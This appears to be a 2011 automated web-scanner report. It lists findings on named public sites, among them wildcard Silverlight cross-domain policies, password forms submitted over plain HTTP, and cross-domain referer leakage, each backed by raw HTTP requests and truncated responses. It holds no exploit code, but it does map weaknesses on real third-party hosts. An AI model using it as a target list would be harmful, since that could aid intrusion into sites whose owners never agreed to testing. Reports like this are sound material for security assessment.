HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sun, 04 Sep 2011 00:23:13 GMT Expires: Fri, 02 Sep 2011 23:16:39 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 1293 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Server: nginx Date: Sun, 04 Sep 2011 00:52:32 GMT Content-Type: text/xml Content-Length: 255 Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT Connection: close Expires: Sun, 11 Sep 2011 00:52:32 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:42:19 GMT Server: Omniture DC/2.0.0 xserver: www172 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://video.od |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: video.od.visiblemeasures |
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Sun, 04 Sep 2011 01:17:23 GMT Content-Type: text/xml Content-Length: 326 Last-Modified: Wed, 09 Mar 2011 01:34:37 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <r ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.goutsa.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.goutsa.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:26:15 GMT Server: Apache Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT ETag: "18a-466013cce5c00" Accept-Ranges: bytes Content-Length: 394 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> <domain uri="https://*"/> <domain uri="http://*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tulsaworld.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.tulsaworld.com |
HTTP/1.1 200 OK Content-Length: 319 Content-Type: text/xml Last-Modified: Fri, 26 Nov 2010 22:31:11 GMT Accept-Ranges: bytes ETag: "88a3a1a0b98dcb1:277" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 01:28:24 GMT Connection: close ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resour ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT Accept-Ranges: bytes ETag: "80964c5f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 01:28:33 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /submit |
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:25 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=26937 10.2.129.225 Cache-Control: no-cache,no-store,must Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8468 <!DOCTYPE html> <html xmlns:fb="http://www <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pic ...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.foxsports |
Path: | /09/03/11/Longhorn |
GET /09/03/11/Longhorn Host: www.foxsportssouthwest Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/1.0.3 Content-Type: text/html Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sun, 04 Sep 2011 01:26:08 GMT Date: Sun, 04 Sep 2011 01:26:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42382 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <!-- fsn - --> <meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''> <form enctype="multipart/form <tr> ...[SNIP]... <td>pass:<input type=password name='login_password' class='net_loginblock'></td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ispsports.com |
Path: | /radio-network-affiliates |
GET /radio-network-affiliates Host: www.ispsports.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 01:26:14 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... </h5> <form id="login" action="affiliate <div id="username"> ...[SNIP]... </label> <input id="password_field" type="password" name="password" title="Password" value="" tabindex="2" /> </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sacbee.com |
Path: | /reg-bin/int.cgi |
GET /reg-bin/int.cgi HTTP/1.1 Host: www.sacbee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds020p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 04 Sep 2011 01:27:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:27:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120521 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <SCRIPT LANGUAGE="JavaScript"> <!-- var gomez={ gs: new ...[SNIP]... <br /> <form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()"> <input type="hidden" name="mode" value="register_done" /> ...[SNIP]... <td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword ...[SNIP]... <td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sacbee.com |
Path: | /reg-bin/int.cgi |
GET /reg-bin/int.cgi HTTP/1.1 Host: www.sacbee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds020p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 04 Sep 2011 01:27:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:27:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120521 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <SCRIPT LANGUAGE="JavaScript"> <!-- var gomez={ gs: new ...[SNIP]... </h3> <form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post"> <input type="hidden" name="mode" value="login_done" /> ...[SNIP]... </label> <input type="password" name="password" id="password" value="" size="25" class="miregtext"> <input type="image" id="signin-button" src="/static/images ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thatsracin.com |
Path: | /reg-bin/int.cgi |
GET /reg-bin/int.cgi HTTP/1.1 Host: www.thatsracin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds020p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 04 Sep 2011 01:28:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:28:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69876 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title></title> <meta http-equiv="Content-Type" content=" ...[SNIP]... </h3> <form name="LoginForm" action="/reg-bin/int.cgi" method=post> <input type="hidden" name="mode" value="login_done"> ...[SNIP]... </label> <input type="password" name="password" class="miregtext" value=""> <p class="form-notif"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thatsracin.com |
Path: | /reg-bin/int.cgi |
GET /reg-bin/int.cgi HTTP/1.1 Host: www.thatsracin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds020p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 04 Sep 2011 01:28:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:28:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69876 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title></title> <meta http-equiv="Content-Type" content=" ...[SNIP]... </script> <form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration"> <input type="hidden" name="mode" value="register_done"> ...[SNIP]... </label> <input type="password" name="password" class="miregpassword" id="miregpasswordpassword </div> ...[SNIP]... </label> <input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwc </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thatsracin.com |
Path: | /reg-bin/int.cgi |
GET /reg-bin/int.cgi HTTP/1.1 Host: www.thatsracin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/1.3.41 Mi-app-host: rdds020p Content-Type: text/html; charset=ISO-8859-1 Expires: Sun, 04 Sep 2011 01:28:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 04 Sep 2011 01:28:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69876 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title></title> <meta http-equiv="Content-Type" content=" ...[SNIP]... <div class="login-form"> <form method="post" action="/reg-bin/int.cgi" <input type="hidden" value="login_done" name="mode"/> ...[SNIP]... </label> <input type="password" class="text" name="password" /> <!-- /.form_input --> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.linkedin.com |
Path: | /secure/login |
GET /secure/login HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: leo_auth_token="GST Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 04 Sep 2011 01:26:19 GMT Set-Cookie: NSC_MC_QH_MFP=ffffff Content-Length: 16499 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA <meta name="p ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://charlotteobserver |
Path: | / |
GET / HTTP/1.1 Host: charlotteobserver Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:16 GMT Server: Apache MIME-Version: 1.0 Content-Length: 15034 Vary: Accept-Encoding MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>O ...[SNIP]... <span class="ap_loginForm ...[SNIP]... </span><a href="http://charlot ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://control.adap.tv |
Path: | /control |
GET /control?context=ai_view Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Connection: Keep-Alive Access-Control-Allow Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: adaptv_unique_user_cookie Content-Type: text/xml; charset=iso-8859-1 Content-Length: 32443 <?xml version="1.0" encoding="UTF-8"?> <OneScript> <Breadcrumbs> <Query><![CDATA[context ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://feedburner.google |
Path: | /fb/a/mailverify |
GET /fb/a/mailverify HTTP/1.1 Host: feedburner.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Sun, 04 Sep 2011 01:22:27 GMT X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Set-Cookie: S=izeitgeist-ad-metrics Server: GSE Expires: Sun, 04 Sep 2011 01:22:27 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta name="r ...[SNIP]... <h1><a href="/fb/a/home ...[SNIP]... <div id="footer"> ©2004–2011 (<a href="http://feedburner ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://log.adap.tv |
Path: | /log |
GET /log?event=crossView Host: log.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: audienceData="{\"v\":2,\ |
HTTP/1.1 200 OK Server: adaptv/1.0 Content-Type: text/plain Connection: Keep-Alive Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://qlog.adap.tv |
Path: | /log |
GET /log?event=availsFailure Host: qlog.adap.tv Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: adaptv_unique_user_cookie |
HTTP/1.1 200 OK Server: adaptv/1.0 Content-Type: text/plain Connection: Keep-Alive Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sprint.tt.omtrdc |
Path: | /m2/sprint/mbox/standard |
GET /m2/sprint/mbox/standard Host: sprint.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.sprint.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi_holtihx7Bhabx7Dhx7F= |
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315097027971 Content-Type: text/javascript Content-Length: 179 Date: Sun, 04 Sep 2011 00:45:30 GMT Server: Test & Target mboxFactories.get( |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.64.196.55 X-Cnection: close Date: Sun, 04 Sep 2011 00:44:11 GMT Content-Length: 259 <script type="text/javascript"> parent.postMessage("cb ...[SNIP]... |
Severity: | Medium |
Confidence: | Certain |
Host: | https://google.com |
Path: | / |
Issued to: | www.google.com |
Issued by: | Thawte SGC CA |
Valid from: | Thu Dec 17 18:00:00 GMT-06:00 2009 |
Valid to: | Sun Dec 18 17:59:59 GMT-06:00 2011 |
Issued to: | Thawte SGC CA |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Wed May 12 18:00:00 GMT-06:00 2004 |
Valid to: | Mon May 12 17:59:59 GMT-06:00 2014 |
Issued to: | Class 3 Public Primary Certification Authority |
Issued by: | Class 3 Public Primary Certification Authority |
Valid from: | Sun Jan 28 18:00:00 GMT-06:00 1996 |
Valid to: | Wed Aug 02 17:59:59 GMT-06:00 2028 |
Severity: | Medium |
Confidence: | Certain |
Host: | https://login.yahoo.com |
Path: | / |
Issued to: | login.yahoo.com |
Issued by: | DigiCert High Assura |